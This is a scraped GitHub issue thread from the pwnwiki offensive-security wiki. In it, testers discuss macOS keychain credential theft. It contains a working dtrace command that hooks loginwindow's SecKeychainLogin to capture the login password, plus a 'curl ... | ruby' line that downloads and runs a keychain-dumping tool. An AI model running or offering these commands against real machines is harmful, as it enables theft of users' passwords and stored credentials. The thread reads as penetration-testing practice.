Code Monkey home page Code Monkey logo

Comments (5)

OJ avatar OJ commented on August 19, 2024

This is what I get:

dtrace: invalid probe specifier pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[R_ECX]));}: pid provider is not installed on this system

😢
System info:

$ uname -a                                                                                                     ⏎
Darwin cdecl.local 13.4.0 Darwin Kernel Version 13.4.0: Wed Mar 18 16:20:14 PDT 2015; root:xnu-2422.115.14~1/RELEASE_X86_64 x86_64

from pwnwiki.github.io.

WebBreacher avatar WebBreacher commented on August 19, 2024

@OJ - It was on Twitter so it has to be true!

Seriously though, the first command appears to work on my MBP:

└──> $ sudo dtrace -n 'pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[R_ECX]));}' -p $(ps -A | grep -m1 loginwindow | awk '{print $1}') dtrace: description 'pid$target::SecKeychainLogin:entry' matched 1 probe

And the second (dump the keychain) works too but pops up a "do you want this app to access your keychain" prompt for each cred that is being dumped. I'm VERY sure that users/victims will notice this.

└──> $ uname -a Darwin c02kj19lfft4.home 13.4.0 Darwin Kernel Version 13.4.0: Wed Mar 18 16:20:14 PDT 2015; root:xnu-2422.115.14~1/RELEASE_X86_64 x86_64

from pwnwiki.github.io.

OJ avatar OJ commented on August 19, 2024

hehe yeah sorry mate. I wasn't implying that it was you. I think it might rely on Yosemite (I'm still on Mavericks).

Fun stuff though!

from pwnwiki.github.io.

WebBreacher avatar WebBreacher commented on August 19, 2024

No worries....good to know where it does/does not work too. I'm on 10.9.5 OS X

from pwnwiki.github.io.

sho-luv avatar sho-luv commented on August 19, 2024

Curl https://raw.githubusercontent.com/erran/keyjacker/master/keyjacker.rb | ruby

Co worker Erran wrote this when he was like 16 or so. Still works pretty well on assessments. Again you need to click allow which means you need gui access but I have pulled that off remotely with vnc. Not super stealthy but gets the job done.

Leon Johnson

On Jun 25, 2015, at 6:48 AM, OJ Reeves [email protected] wrote:

This is what I get:

dtrace: invalid probe specifier pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[R_ECX]));}: pid provider is not installed on this system

System info:

$ uname -a ⏎
Darwin cdecl.local 13.4.0 Darwin Kernel Version 13.4.0: Wed Mar 18 16:20:14 PDT 2015; root:xnu-2422.115.14~1/RELEASE_X86_64 x86_64

Reply to this email directly or view it on GitHub.

from pwnwiki.github.io.

Related Issues (20)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.